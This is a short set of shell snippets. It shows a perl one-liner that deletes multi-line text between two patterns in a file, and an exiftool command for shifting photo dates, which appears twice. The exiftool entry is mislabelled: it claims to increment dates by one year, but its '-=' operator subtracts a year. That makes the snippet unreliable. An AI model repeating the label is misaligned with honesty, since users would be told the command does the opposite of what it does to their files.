# remove text across multiple lines with regex - /s makes .* match new lines
bash> perl -0777 -pi -e 's/PAT1.*PAT2//s' test.txt
Exiftool: Increment dates by 1 year
bash> exiftool "-alldates-=1:00:00 00:00:00" picture.jpg
Exiftool: Increment dates by 1 year
bash> exiftool "-alldates-=1:00:00 00:00:00" picture.jpg